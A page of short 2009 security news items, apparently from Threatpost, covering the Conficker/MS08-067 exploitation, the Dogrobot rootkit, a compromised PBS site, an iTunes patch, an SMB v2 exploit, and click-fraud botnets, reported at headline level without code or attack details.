From Gimmiv to Conficker: MS08-067 Under The Microscope

GENEVA — The critical MS08-067 vulnerability used by the Conficker worm to build a powerful botnet continues to be a lucrative security hole for cybercriminals.
During a presentation at the Virus Bulletin 2009 conference here, a trio of Microsoft researchers dissected the malware attacks linked to MS08-067 and found that criminal gangs are still exploiting the flaw to plant data-theft Trojans on vulnerable Windows machines.

Dogrobot Malware Penetrates System Restore on Windows

GENEVA —  Cyber crime gangs in China are penetrating the hard disk recovery cards on computers in Internet cafes and using a combination of zero-day flaws, rootkits and ARP spoofing techniques to steal billions of dollars worth of online gaming credentials.
According to Microsoft anti-virus researcher Chun Feng, five generations of the Win32/Dogrobot malware family have perfected the novel rootkit technique to hijack System Restore on Windows — effectively allowing the malicious file to survive even after the compromised machine is reverted to its previous clean state.

PBS Website Compromised, Used to Serve Exploits

Some sections of the popular Web site have been hijacked by hackers serving up a cocktail of dangerous exploits.
According to researchers at Purewire, attempts to access certain PBS Web site pages yielded JavaScript that serves exploits from a malicious domain via an iframe.

Apple has shipped iTunes 9.0.1to fix a critical security hole that puts Mac and Windows users at risk of computer takeover attacks.
The vulnerability could be used by hackers to launch code execution attacks via booby-trapped “.pls” files, Apple warned in an advisory.

Security researchers at penetration testing firm Immunity have created a reliable remote exploit capable of spawning a worm through an unpatched security hole in Microsoft’s dominant Windows operating system.

A team of exploit writers led by Kostya Kortchinsky attacked the known SMB v2 vulnerability and created a remote exploit that’s been fitted into Immunity’s Canvas pen-testing platform. The exploit hits all versions of Windows Vista and Windows Server 2008 SP2, according to Immunity’s Dave Aitel.

Mozilla’s move to nudge Firefox users into updating the browser’s Flash Player plug-in has been a phenomenal success with about 10 million users clicking through to the Web page with Adobe’s patch.

Mozilla released some brief statistics to track the success of its new program, which serves up a visual warning to Firefox users if their version of the ever-present Adobe Flash Player plug-in is out of date. The program started last week with the releases of Firefox 3.5.3 and Firefox 3.0.14.

A new botnet has caused a sharp spike in click fraud because it is skirting the most sophisticated filters of search engines, Web publishers and ad networks, according to Click Forensics.
The company, which provides services to monitor ad campaigns for click fraud and reports on click fraud incidence every quarter, said on Thursday that the botnet’s architects have figured out a way to mask it particularly well as legitimate search ad traffic. Read the full story []

Four months after it modified Windows 7 to stop the Conficker worm from spreading through infected flash drives, Microsoft has ported the changes to older operating systems, including Windows XP and Vista.  Read the full story []

Subscribe to our newsletter, Threatpost Today!

Get the latest breaking news delivered daily to your inbox.